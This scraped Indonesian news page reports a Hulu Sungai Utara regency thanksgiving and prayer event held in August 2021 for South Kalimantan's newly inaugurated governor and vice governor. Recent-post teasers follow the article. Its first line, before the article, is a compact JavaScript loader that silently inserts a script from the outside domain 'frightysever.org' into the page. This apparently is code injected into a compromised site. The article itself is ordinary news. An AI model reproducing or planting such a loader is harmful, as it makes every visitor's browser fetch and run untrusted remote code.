(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Hulu Sungai Utara

Sambut Gubernur dan Wagub Kalsel 2021-2024, Pemkab HSU Syukuran dan Doa Bersama


KANALKALIMANTA.COM, AMUNTAI – Pemerintah Kabupaten Hulu Sungai Utara (HSU) menggelar syukuran dan doa bersama atas dilantiknya Gubernur dan Wakil Gubernur Provinsi Kalimantan Selatan (Kalsel) periode 2021 – 2024. Acara berlangsung di Aula KH Dr Idham Chalid, Kamis (26/8/2021) malam.

Dihadiri undangan terbatas dengan tetap mengedapankan protokol kesehatan yang ketat, kegiatan diisi dengan shalat magrib, shalat hajat, pembacaan surah yasin, shalawat, shalat isya berjamaah dan ditutup dengan tausiah oleh Habib Ahmad Al Habsy dari Jakarta.

Bupati HSU, H Abdul Wahid HK mengungkapkan rasa syukur dapat terselenggaranya kegiatan ini atas pelantikan Gubernur Kalsel periode 2021-2024.

 

 

Baca juga: Wali Kota Aditya Terima Kunker Komisi III DPRD Tabalong

“Alhamdulillah kita bisa melaksanakan shalat magrib, shalat hajat dan shalat isya berjamaah, pada hari ini dalam rangka mensyukuri nikmat Allah atas pelantikan Gubernur Kalsel H Sahbirin Noor dan Wakil Gubernur Kalsel H Mudihin,” kata Bupati Abdul Wahid.

Dalam kesempatan tersebut, Bupati Abdul Wahid juga mengingatkan kembali di masa pandemi seperti sekarang dalam mengadakan kegiatan keagamaan untuk tetap menjaga protokol kesehatan yang ketat.

“Alhamdulillah di suasana pandemi ini majelis taklim di Kabupaten HSU tidak dilarang untuk melaksanakan kegiatan namun tetap dianjurkan menjaga protokol kesehatan, supaya jamaah kita bisa mengikuti seluruh kegiatan dalam keadaan sehat wal’afiat lahir dan batin,” katanya.

Selain itu Bupati Wahid juga mengaku bersyukur atas kedatangan Habib Ahmad Al Habsyi untuk mengisi tausiah dalam kegiatan ini.

“Alhamdulillah kita Kedatangan tamu habib Ahmad Al Habsyi dari Jakarta, mudah-mudahan nanti habib berkesempatan menyampaikan sesuatu dan sekaligus juga mencerahkan kita semua,” pungkasnya.

Tampak Hadir dalam kegiatan Sekda HSU, Ketua DPRD HSU, Ketua TP. PKK HSU, Ketua DWP HSU, Para Asisten Sekda HSU, Para Kepala SKPD lingkup Pemkab HSU, dan Para Tokoh Agama.(kanalkalimanta.com/dew)

Reporter : dew
Editor : kk


Risa

Recent Posts

Bingkisan Kebahagiaan PLN untuk Warga Kalsel yang Membutuhkan

KANALKALIMANTAN.COM, BANJARBARU - PT PLN (Persero) Unit Induk Penyaluran dan Pusat Pengatur (UIP3B) Kalimantan melalui… Read More

12 menit ago

Asa Warga Banjarmasin Timnas Indonesia Masuk Olimpiade Paris 2024

KANALKALIMANTAN.COM, BANJARMASIN - Nonton bareng (Nobar) laga semifinal AFC U-23 Indonesia vs Uzbekistan di halaman… Read More

21 menit ago

Ini Tiga Rekor Muri Sebagai Kado HUT ke-73 Kabupaten Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS – Tiga rekor Museum Rekor Indonesia (Muri) menjadi catatan kado Hari Jadi… Read More

32 menit ago

Ritual Laluhan dan Ngarunya Lengkapi Perayaan HUT ke-73 Kabupaten Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Momen perayaan Hari Jadi ke-218 Kota Kuala Kapuas dan Hari Ulang… Read More

35 menit ago

Laga Terakhir Timnas Indonesia Berharap Juara Ketiga Piala Asia U-23

KANALKALIMANTAN.COM, BANJARBARU - Tim Nasional (Timnas) Indonesia U-23 dipastikan gagal melaju ke final Piala Asia… Read More

3 jam ago

Atraksi Ritual Laluhan Warnai Hari Jadi ke-218 Kota Kuala Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Atraksi budaya ritual Laluhan Suku Dayak Ngaju ditampilkan memeriahkan Hari Jadi… Read More

10 jam ago

This website uses cookies.